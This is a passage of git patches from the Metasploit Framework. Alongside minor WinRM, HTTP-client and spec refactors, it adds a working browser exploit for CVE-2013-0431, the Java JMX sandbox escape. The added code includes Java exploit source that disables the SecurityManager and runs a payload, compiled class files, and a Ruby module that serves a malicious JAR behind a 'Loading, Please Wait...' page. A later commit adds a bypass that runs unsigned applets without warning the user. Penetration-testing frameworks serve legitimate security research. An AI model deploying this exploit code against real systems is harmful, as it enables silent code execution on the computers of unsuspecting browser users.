exploit - unless check == Msf::Exploit::CheckCode::Vulnerable - return - end unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote def temp_dir print_status "Grabbing %TEMP%" - resp,c = send_request_ntlm(winrm_open_shell_msg) + resp = send_winrm_request(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp,c = send_request_ntlm(winrm_wql_msg(wql)) + resp = send_winrm_request(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) @@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp,c = send_request_ntlm(data) + resp = send_winrm_request(data) unless resp.code == 200 return false end From accd6208433afb177c603ceb8e24efb165c24f6d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:50:30 -0600 Subject: [PATCH 035/139] Clean up pry --- lib/rex/proto/http/client.rb | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ba46142a45..cf2cab885e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http @@ -356,15 +354,14 @@ class Client end end - return res if opts['username'].nil? or opts['username'] = '' + return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(username,password) + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) else - opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} + opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} end - req = request_cgi(opts) res = _send_recv(req,t,persist) return res From d88ad80116e83190660212bc4104d745e7ec27b4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 16:39:53 +0100 Subject: [PATCH 036/139] Added first version of cve-2013-0431 --- data/exploits/cve-2013-0431/B.class | Bin 0 -> 619 bytes data/exploits/cve-2013-0431/Exploit.class | Bin 0 -> 2743 bytes external/source/exploits/cve-2013-0431/B.java | 19 +++ .../exploits/cve-2013-0431/Exploit.java | 93 ++++++++++++ .../source/exploits/cve-2013-0431/Makefile | 18 +++ .../multi/browser/java_jre17_jmxbean_2.rb | 134 ++++++++++++++++++ 6 files changed, 264 insertions(+) create mode 100755 data/exploits/cve-2013-0431/B.class create mode 100755 data/exploits/cve-2013-0431/Exploit.class create mode 100755 external/source/exploits/cve-2013-0431/B.java create mode 100755 external/source/exploits/cve-2013-0431/Exploit.java create mode 100644 external/source/exploits/cve-2013-0431/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_jmxbean_2.rb diff --git a/data/exploits/cve-2013-0431/B.class b/data/exploits/cve-2013-0431/B.class new file mode 100755 index 0000000000000000000000000000000000000000..953d5408a7a15e180bfb1570604cbab55bca2e5a GIT binary patch literal 619 zcmah`%TB^j5Is{W)moK@;v2<{g@r6!q9$r|g^vV+ad{~>qzWzRgUA=T)s;pQKfsSt zr^SdG6LXW9J7?ycb04p7PcHzrv7uuOSsk;O(~#3Kj|B~j8kRIH6Ouc&V+VVLgjsA5 z)I+x=2{TpOk*8s|DZRRAb{Lte1;V;M5xuyM**PY8p+lH8i`6U97v+v{+U2w6m9&Bi zL9e-?XUStb;wKNbq7eh*n9#6dU=?{nc0@b6v1Bi>T}Q*3fpruJsZn<*N}vP6W(@n% z3Ozd*l+Qi8&lYXj`jXhUA|XQl=j6U+N#8$ooxpQD9qAE_mOG*ocFo~E{@1SjdE;*f zt_}P^b_p3@2DQ(lo(M;@BisC^PyAlLx|L!B1tj^;2pWH&!kOQUqs~>Gv%-10^Z+V7 zLbh5 zl_4=Daa|yE)G!U_xIlSR^96xGmo=^nRQDOCJ}{lVs@o&l)eI#8S52U5*wND0`?Z`W z_MBvhP9n>Q1S%$Vr(bujS>pmHn);@+87+~~%*jMoM$6|@KEbeK8|Gx{ak}D0 z?Ia2wQWB;YutiV;kx3())jdA~d;PwPuKb<~$I-LOpCwjAU{heG6drJjh;7fsK zYR6qZs2%rd$34{^Gw*1oV`z>=uD^1LuOR*cCndZW>Pnz?4YQ9pH&0))5Q-Hf5cSlw zTrQ(Ki4JcPC>!fs0mq8!F<0wIVEdZe(!!@JKWpBZjIzPiCw$G+CiN_9B{5X!7go2A zv&J>IEBiD0V9rf^sbZMD>iK4XO;2l{8Y&Fwd9PhM@`dszyBoJ&DME%EV4?CR2sVv% zHurFzwGD?|C%NwFaj%<7$6D<&sy8*ebcGCa#=1_uBmScbU6ArKQxy4QFN)~d)MpE+ zPSexY5`e2p(X8%hdG7{DoYUqrY$isL)eKW$Ta*8&l{`jd=0X4icho}t7J9?wCp-CMH^lVR5+*ERN*Z$GN03VO%b;r z#Y!n{B00Xk5t#MIRrKfuQBrR{lhl9io+S23UNkG$`-WZ^A){W`mjZ1}*hW0BQ)i{g z3Ck|9Q}XN-p{(b?Uo)lMm%=VSzfF9-fdE+Vh;eM;s-83NBm`qi5cl~$t)Fm=THq?MOeaA} zeTjV%`z0-~jIEwbl*sbnI^hoOU_5*b8J|o4pIk*a54A*}d4TPYpz`MunGBX63e|?x z;KRGvuLf&F2a-~ii`YSiIMpR9)Nt!B*j)b|D%6UH-y@{Td$&SjVfpU`1d{=AkDh^( z7{IeQg|psVU?S$7*hLmjl9O(hz-cmZhVk?eK`*ttso#flv~iK{LFfr;B~<>z6SPVk zl6Xnt@MDxcMv&i0NBAbV&pk&M)GSGsoX?8>XuS}D2YBugb`G!*o=*m%yB=V7GRTDQ zVH#^j%WKfUMAl$0Q`zX2g&HX2x5by=dvsT*%pG(N4D+ZFA~;XFFQN{Y$muAKawo){ OV>nLjm$@p#iGKl|D8%ys literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2013-0431/B.java b/external/source/exploits/cve-2013-0431/B.java new file mode 100755 index 0000000000..fec2767060 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/B.java @@ -0,0 +1,19 @@ +import java.security.AccessController; +import java.security.PrivilegedExceptionAction; + +public class B + implements PrivilegedExceptionAction +{ + public B() + { + try + { + AccessController.doPrivileged(this); } catch (Exception e) { + } + } + + public Object run() { + System.setSecurityManager(null); + return new Object(); + } +} diff --git a/external/source/exploits/cve-2013-0431/Exploit.java b/external/source/exploits/cve-2013-0431/Exploit.java new file mode 100755 index 0000000000..2a399019f3 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/Exploit.java @@ -0,0 +1,93 @@ +/* +* From Paunch with love (Java 1.7.0_11 Exploit) +* +* Deobfuscated from Cool EK by SecurityObscurity +* +* https://twitter.com/SecObscurity +*/ +import java.applet.Applet; +import com.sun.jmx.mbeanserver.Introspector; +import com.sun.jmx.mbeanserver.JmxMBeanServer; +import com.sun.jmx.mbeanserver.MBeanInstantiator; +import java.lang.invoke.MethodHandle; +import java.lang.invoke.MethodHandles.Lookup; +import java.lang.invoke.MethodType; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import javax.management.ReflectionException; +import java.io.*; +import metasploit.Payload; + +public class Exploit extends Applet +{ + + public void init() + { + + try + { + int length; + byte[] buffer = new byte[5000]; + ByteArrayOutputStream os = new ByteArrayOutputStream(); + + // read in the class file from the jar + InputStream is = getClass().getResourceAsStream("B.class"); + + // and write it out to the byte array stream + while( ( length = is.read( buffer ) ) > 0 ) + os.write( buffer, 0, length ); + + // convert it to a simple byte array + buffer = os.toByteArray(); + + Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context"); + + Method method = getMethod(class1, "enter", true); + Object obj = method.invoke(null, new Object[0]); + Method method1 = getMethod(class1, "createClassLoader", false); + Object obj1 = method1.invoke(obj, new Object[1]); + + Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader"); + Method method2 = getMethod(class2, "defineClass", false); + + Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer }); + my_class.newInstance(); + + Payload.main(null); + + } + catch (Throwable localThrowable){} + + } + + + private Method getMethod(Class class1, String s, boolean flag) + { + try { + Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods"); + Method[] amethod1 = amethod; + + for (int i = 0; i < amethod1.length; i++) { + Method method = amethod1[i]; + String s1 = method.getName(); + Class[] aclass = method.getParameterTypes(); + if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method; + } + } catch (Exception localException) { } + + return null; + } + + private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException + { + Object obj = null; + JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true); + MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator(); + + Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator"); + Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class }); + return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj }); + } + +} + diff --git a/external/source/exploits/cve-2013-0431/Makefile b/external/source/exploits/cve-2013-0431/Makefile new file mode 100644 index 0000000000..7c77a9c3b4 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/Makefile @@ -0,0 +1,18 @@ +# rt.jar must be in the classpath! + +CLASSES = \ + Exploit.java \ + B.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/cve-2013-0431/ + mv B.class ../../../../data/exploits/cve-2013-0431/ + +clean: + rm -rf *.class diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb new file mode 100644 index 0000000000..32301affd6 --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -0,0 +1,134 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java Applet JMX Remote Code Execution', + 'Description' => %q{ + This module abuses the JMX classes from a Java Applet to run arbitrary Java + code outside of the sandbox as exploited in the wild in February of 2013. The + vulnerability affects Java version 7u11 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'Adam Gowdiak', # Vulnerability discovery + 'SecurityObscurity', # Exploit analysis and deobfuscation + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-0431' ], + [ 'OSVDB', '89613' ], + [ 'BID', '57726' ], + [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ], + [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ], + [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ], + [ 'URL', 'http://pastebin.com/QWU1rqjf' ] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 19 2013' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class") + @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @exploit_class_name = rand_text_alpha("Exploit".length) + @exploit_class.gsub!("Exploit", @exploit_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@exploit_class_name}.class", @exploit_class) + jar.add_file("B.class", @loader_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From d7b89a22281d72089b0357dbe3904fdc8804601c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 17:50:47 +0100 Subject: [PATCH 037/139] added security level bypass --- data/exploits/cve-2013-0431/Exploit.class | Bin 2743 -> 2744 bytes data/exploits/cve-2013-0431/Exploit.ser | Bin 0 -> 1517 bytes .../multi/browser/java_jre17_jmxbean_2.rb | 57 ++++++++---------- 3 files changed, 25 insertions(+), 32 deletions(-) create mode 100755 data/exploits/cve-2013-0431/Exploit.ser diff --git a/data/exploits/cve-2013-0431/Exploit.class b/data/exploits/cve-2013-0431/Exploit.class index 526a59dbaf3d13c6c037fb0b22cd78fd6a6ae2e5..f76c43d3e17695bf6e445aec23cff58a1de7daef 100755 GIT binary patch delta 16 Ycmdlkx_jqk<*2SIVV@?u&+BQ&GsDcR zz1u^@l>&vg6dYuAVM3P5IH_dc7leWtZQw|^M^e)@O#-k;aM{kZ}wUD#n!gx2y?fh{E+ zX3oKlu2;&Miz_a;%bSN!0}sgj#ku*J+dp9v#qZbNd~5shr9aO3rb};{af#;r+9&p( z%P-tmg?a~GjTYiQ8qNfNh;f@ab`Oo^N)F)SNJXh_<&nTUO1S}C4T8IdO$oxpi4r`@ zPmG%K7)=K*$Vg4Jk|>=W!bW*;ur~}jHQCHHTMNuV7aB3Qnz?9<#=+}LOqVBPH$(q! zmk7dd2$rkV-A)Mp(i!+%$|OtB5Ue&~S)bBzaCr%8^9f3ym?y5NOW>vm`ST~=ee~PA z-+ZwO*9P!1OPxCQ=~K4Sj?na^k3>=09jKqGRK~Wa1Br$H|BzTi$*8*Vhp>TDV&*op z4+e1MJd?LDw?}i_05-y%SL(p}IFK-aO`b?)@D6G!r0c*{ZWrN&Vi3AVABM*+Wb~0L*qCtXnF)s-$tLLAmPg!)JjgaB&W?PXwkJhCfD78-sMM%VsZGdc zZOTK>cAz@ru^V?_C8J;dyoUZ59zlgleM<2p#uMjYds&v263W+XGa56QU_aGb8JdDO z=8#h)`kT~anpz}poyCySdXySVaM(FxFo@`~5tG(kW)dWGSC)WS#?5wlbufh8XNy50 z7A>1PE}BFQ8C)CDz&O}inmQ(d_cWr?%yaYEHYhNmB1SV0yK```(hV}gFZ$Di>;5<| zN^xBCWhpfUvC`~2!(~F6b&Y7eSC8EyKU(Qj+Y%l8+{4HPPV0-}1-qxp^FFyVu^=r(lfhNC~O25ZK&AMUYzkK^vW%zgHoeHc|CsJ!B z)cRZDzb8Ln76mQ64y=t6Mx$D%);{!@4(!>m@rq5?lf*Bw2_dJ13_b%5)goAbs1g;K F{tskD^4tIb literal 0 HcmV?d00001 diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 32301affd6..43c42c764d 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -78,44 +78,37 @@ class Metasploit3 < Msf::Exploit::Remote )) end - - def setup - path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class") - @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class") - @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - @exploit_class_name = rand_text_alpha("Exploit".length) - @exploit_class.gsub!("Exploit", @exploit_class_name) - super - end - def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i - jar = payload.encoded_jar - jar.add_file("#{@exploit_class_name}.class", @exploit_class) - jar.add_file("B.class", @loader_class) - metasploit_str = rand_text_alpha("metasploit".length) - payload_str = rand_text_alpha("payload".length) - jar.entries.each { |entry| - entry.name.gsub!("metasploit", metasploit_str) - entry.name.gsub!("Payload", payload_str) - entry.data = entry.data.gsub("metasploit", metasploit_str) - entry.data = entry.data.gsub("Payload", payload_str) - } - jar.build_manifest + paths = [ + [ "Exploit.ser" ], + [ "Exploit.class" ], + [ "B.class" ] + ] - send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) - when /\/$/ - payload = regenerate_payload(cli) - if not payload - print_error("Failed to generate the payload.") - send_not_found(cli) - return + p = regenerate_payload(cli) + + jar = p.encoded_jar + + paths.each do |path| + 1.upto(path.length - 1) do |idx| + full = path[0,idx].join("/") + "/" + if !(jar.entries.map{|e|e.name}.include?(full)) + jar.add_file(full, '') + end + end + fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") + data = fd.read(fd.stat.size) + jar.add_file(path.join("/"), data) + fd.close end + + print_status("Sending Applet.jar") + send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) + when /\/$/ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') @@ -126,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote def generate_html html = %Q|Loading, Please Wait...| html += %Q|

Loading, Please Wait...

| - html += %Q|| + html += %Q|| html += %Q|| return html end From da9e58ef79440d86f77ee51e2d9549511676411c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 18:14:24 +0100 Subject: [PATCH 038/139] Added the java code to get the ser file --- .../exploits/cve-2013-0431/Serializer.java | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 external/source/exploits/cve-2013-0431/Serializer.java diff --git a/external/source/exploits/cve-2013-0431/Serializer.java b/external/source/exploits/cve-2013-0431/Serializer.java new file mode 100644 index 0000000000..2dc2517937 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/Serializer.java @@ -0,0 +1,20 @@ +import java.io.*; + +public class Serializer { + + public static void main(String [ ] args) + { + try { + Exploit b=new Exploit(); // target Applet instance + ByteArrayOutputStream baos=new ByteArrayOutputStream(); + ObjectOutputStream oos=new ObjectOutputStream(baos); + oos.writeObject(b); + FileOutputStream fos=new FileOutputStream("Exploit.ser"); + fos.write(baos.toByteArray()); + fos.close(); + } catch (Exception ex) { + ex.printStackTrace(); + } + } + +} From bf216cca5cd41350d172280d9ac30684c5087eb7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 18:14:53 +0100 Subject: [PATCH 039/139] description and references updated --- .../multi/browser/java_jre17_jmxbean_2.rb | 65 ++++++++++--------- 1 file changed, 35 insertions(+), 30 deletions(-) diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 43c42c764d..c448bf968a 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote super( update_info( info, 'Name' => 'Java Applet JMX Remote Code Execution', 'Description' => %q{ - This module abuses the JMX classes from a Java Applet to run arbitrary Java - code outside of the sandbox as exploited in the wild in February of 2013. The - vulnerability affects Java version 7u11 and earlier. + This module abuses the JMX classes from a Java Applet to run arbitrary Java code + outside of the sandbox as exploited in the wild in February of 2013. Additionally, + this module bypasses default security settings introduced in Java 7 Update 10 to run + unsigned applet without displaying any warning to the user. }, 'License' => MSF_LICENSE, 'Author' => @@ -42,7 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ], [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ], - [ 'URL', 'http://pastebin.com/QWU1rqjf' ] + [ 'URL', 'http://pastebin.com/QWU1rqjf' ], + [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, @@ -83,43 +85,46 @@ class Metasploit3 < Msf::Exploit::Remote case request.uri when /\.jar$/i - paths = [ - [ "Exploit.ser" ], - [ "Exploit.class" ], - [ "B.class" ] - ] - - p = regenerate_payload(cli) - - jar = p.encoded_jar - - paths.each do |path| - 1.upto(path.length - 1) do |idx| - full = path[0,idx].join("/") + "/" - if !(jar.entries.map{|e|e.name}.include?(full)) - jar.add_file(full, '') - end - end - fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") - data = fd.read(fd.stat.size) - jar.add_file(path.join("/"), data) - fd.close - end - - print_status("Sending Applet.jar") - send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) + print_status("Sending JAR") + send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } ) when /\/$/ + print_status("Sending HTML") send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end + end + def generate_jar + paths = [ + [ "Exploit.ser" ], + [ "Exploit.class" ], + [ "B.class" ] + ] + + p = regenerate_payload(cli) + + jar = p.encoded_jar + + paths.each do |path| + 1.upto(path.length - 1) do |idx| + full = path[0,idx].join("/") + "/" + if !(jar.entries.map{|e|e.name}.include?(full)) + jar.add_file(full, '') + end + end + fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") + data = fd.read(fd.stat.size) + jar.add_file(path.join("/"), data) + fd.close + end + return jar.pack end def generate_html html = %Q|Loading, Please Wait...| html += %Q|

Loading, Please Wait...

| - html += %Q|| + html += %Q|| html += %Q|| return html end From 4a84528ecfaff4bc780be129e47ef6cd54666bd4 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 20 Feb 2013 15:02:12 -0600 Subject: [PATCH 040/139] Move pending messages to it()'s args --- spec/lib/rex/proto/http/client_spec.rb | 119 ++++++------------------- 1 file changed, 28 insertions(+), 91 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index de8c68f186..6505655267 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -61,20 +61,11 @@ describe Rex::Proto::Http::Client do cli.close.should be_nil end - it "should send a request and receive a response" do - # cli.send_recv - pending excuse_needs_connection - end + it "should send a request and receive a response", :pending => excuse_needs_connection - it "should send a request and receive a response without auth handling" do - # cli._send_recv - pending excuse_needs_connection - end + it "should send a request and receive a response without auth handling", :pending => excuse_needs_connection - it "should send a request" do - # cli.send_request - pending excuse_needs_connection - end + it "should send a request", :pending => excuse_needs_connection it "should test for credentials" do # cli.should_not have_creds @@ -83,9 +74,7 @@ describe Rex::Proto::Http::Client do pending "Should actually respond to :has_creds" end - it "should send authentication" do - pending excuse_needs_connection - end + it "should send authentication", :pending => excuse_needs_connection it "should produce a basic authentication header" do u = "user1" @@ -94,20 +83,11 @@ describe Rex::Proto::Http::Client do cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end - it "should perform digest authentication" do - # cli.digest_auth - pending excuse_needs_auth - end + it "should perform digest authentication", :pending => excuse_needs_auth - it "should perform negotiate authentication" do - # cli.negotiate_auth - pending excuse_needs_auth - end + it "should perform negotiate authentication", :pending => excuse_needs_auth - it "should get a response" do - # cli.read_response - pending excuse_needs_connection - end + it "should get a response", :pending => excuse_needs_connection it "should end a connection with a stop" do cli.stop.should be_nil @@ -124,96 +104,53 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI" do - pending excuse_lazy :set_encode_uri - end + it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) - it "should return an encoded query string" do - pending excuse_lazy :set_encode_qa - end + it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) # These set_ methods all exercise the evasion opts, looks like - it "should set and return the URI" do - pending excuse_lazy :set_uri - end + it "should set and return the URI", :pending => excuse_lazy(:set_uri) - it "should set and return the CGI" do - pending excuse_lazy :set_cgi - end + it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) - it "should set and return the HTTP verb" do - pending excuse_lazy :set_method - end + it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) - it "should set and return the version string" do - pending excuse_lazy :set_version - end + it "should set and return the version string", :pending => excuse_lazy(:set_version) - it "should set and return the HTTP seperator and body string" do - pending excuse_lazy :set_body - end + it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) - it "should set and return the path" do - pending excuse_lazy :set_path_info - end + it "should set and return the path", :pending => excuse_lazy(:set_path_info) - it "should set and return the whitespace between method and URI" do - pending excuse_lazy :set_method_uri_spacer - end + it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) - it "should set and return the whitespace between the version and URI" do - pending excuse_lazy :set_uri_version_spacer - end + it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) - it "should set and return padding before the URI" do - pending excuse_lazy :set_uri_prepend - end + it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) it "should set and return padding after the URI" do cli.set_uri_append.should be_empty end - it "should set and return the host header" do - pending excuse_lazy :set_host_header - end + it "should set and return the host header", :pending => excuse_lazy(:set_host_header) - it "should set and return the agent header" do - pending excuse_lazy :set_agent_header - end + it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) - it "should set and return the cookie header" do - pending excuse_lazy :set_cookie_header - end + it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) + it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) - it "should set and return the content-type header" do - pending excuse_lazy :set_cookie_header - end + it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) - it "should set and return the content-length header" do - pending excuse_lazy :set_content_len_header - end + it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) - it "should set and return the basic authentication header" do - pending excuse_lazy :set_basic_auth_header - end + it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) - it "should set and return any extra headers" do - pending excuse_lazy :set_extra_headers - end + it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) - it "should set the chunked encoding header" do - pending excuse_lazy :set_chunked_header - end + it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" - it "should set and return raw_headers" do - pending "#set_raw_headers() doesn't seem to actually do anything" - end - - it "should set and return a formatted header" do - pending :set_formatted_header - end + it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) it "should respond to its various accessors" do cli.should respond_to :config From 1913d60d650a7b6d39c3ee0131be22d04a76aae5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 21 Feb 2013 01:13:25 +0100 Subject: [PATCH 041/139] multibrowser support --- .../multi/browser/java_jre17_jmxbean_2.rb | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index c448bf968a..e8534ede40 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -122,10 +122,21 @@ class Metasploit3 < Msf::Exploit::Remote end def generate_html - html = %Q|Loading, Please Wait...| - html += %Q|

Loading, Please Wait...

